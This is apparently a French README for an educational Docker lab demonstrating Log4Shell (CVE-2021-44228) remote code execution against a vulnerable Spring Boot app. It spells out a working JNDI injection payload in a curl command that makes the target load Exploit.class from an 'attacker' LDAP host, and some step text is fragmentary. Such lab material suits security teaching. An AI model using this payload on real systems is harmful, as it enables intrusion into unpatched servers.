
Démonstration d'exploitation RCE basée sur Docker pour Log4Shell (CVE-2021-44228) avec une application Spring Boot vulnérable, un serveur LDAP malveillant et une livraison de charge utile via injection JNDI.
Ce projet simule un scénario d'attaque RCE via la vulnérabilité Log4Shell dans la bibliothèque Apache Log4j 2.
Exploit.class.Prérequis : Docker et Docker Compose installés.
docker compose up --build
Attendez que les deux conteneurs soient prêts. vulnerable-app s'exécutera sur le port 8080.
Ouvrez un nouveau terminal et envoyez une requête contenant la charge utile JNDI via l'en-tête X-Api-Version :
curl -H 'X-Api-Version: ${jndi:ldap://attacker:1389/Exploit}' http://localhost:8080/
vulnerable-app. Vous verrez le message que la charge utile a été enregistrée.attacker. Vous verrez la connexion LDAP redirigée vers le serveur HTTP./tmp/pwned a été créé à l'intérieur du conteneur vulnerable-app :docker exec -it vulnerable-app ls -la /tmp/pwned
Si le fichier existe, cela prouve que le code malveillant Exploit.class a été exécuté avec succès !
Ce projet est exclusivement destiné à des fins éducatives et de recherche en sécurité. Ne l'utilisez en aucun cas à des fins illégales.